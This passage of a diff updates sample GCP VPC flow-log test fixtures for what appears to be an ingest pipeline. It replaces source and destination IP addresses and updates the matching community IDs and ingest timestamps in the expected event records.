"{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392330Z", + "original": "{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", "end": "2019-06-14T03:49:59.565026127Z", @@ -20917,18 +20917,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33564, "bytes": 319459, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 180 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:50u5lJ2RV1XFEhO2zdhxvcEDnVw=", + "community_id": "1:PtUpNPLEJul/LK9u2JbGqtTKFB8=", "bytes": 319459, "name": "default", "transport": "tcp", @@ -20950,7 +20950,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -20987,8 +20987,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869185500Z", - "original": "{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392335500Z", + "original": "{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", "end": "2019-06-14T03:49:59.597079770Z", @@ -21015,18 +21015,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60110, "bytes": 519100, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 224 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KL7wHxQCZ0qbnYIzbI2WPJd+SRw=", + "community_id": "1:GfC7CyOdz/yJsL4pM9oUUVW8XIE=", "bytes": 519100, "name": "default", "transport": "tcp", @@ -21048,7 +21048,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, @@ -21085,8 +21085,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869188200Z", - "original": "{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392341Z", + "original": "{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", "end": "2019-06-14T03:49:46.020466750Z", @@ -21107,10 +21107,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33550, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21124,7 +21124,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5jhhJcbdl0291s4YJNbALw8uNfs=", + "community_id": "1:OALwlPDCqpn2fuHuxdc8nnkXpXM=", "bytes": 139513, "name": "default", "transport": "tcp", @@ -21147,7 +21147,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -21183,8 +21183,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869191Z", - "original": "{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392346600Z", + "original": "{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143811431Z", "end": "2019-06-14T03:49:59.565108649Z", @@ -21213,17 +21213,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41822, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 8 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:d5LNFArWcoFOBS9SH59qLdZmfEw=", + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -21237,7 +21237,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, @@ -21262,8 +21262,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869193700Z", - "original": "{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392352100Z", + "original": "{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", "end": "2019-06-14T03:40:40.058226439Z", @@ -21284,10 +21284,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21301,7 +21301,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1JiVoUP9ZCGJx3vJg7cg+GheZ8o=", + "community_id": "1:9Sajzk9Kjby8Y6aALULEYfH3nYY=", "bytes": 11109, "name": "default", "transport": "tcp", @@ -21324,7 +21324,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -21360,8 +21360,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869196500Z", - "original": "{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392357700Z", + "original": "{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -21382,10 +21382,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33970, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21399,7 +21399,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:scGILrXad9XwMVy45aBpAVcS9Bc=", + "community_id": "1:IK2yh3vtbZJ4V3I3kIgCeSldo3I=", "bytes": 173496, "name": "default", "transport": "tcp", @@ -21422,7 +21422,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -21458,8 +21458,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869199200Z", - "original": "{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392363200Z", + "original": "{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", "end": "2019-06-14T03:49:51.821154389Z", @@ -21486,18 +21486,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 182861, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 245 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:egds7+adPwr8MrtaK+oAyWTmtL0=", + "community_id": "1:Xg3OPnd3ZD+LZsCDrlk/Kdj91e8=", "bytes": 182861, "name": "default", "transport": "tcp", @@ -21519,7 +21519,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -21556,8 +21556,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869201900Z", - "original": "{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392368900Z", + "original": "{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -21578,10 +21578,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21595,7 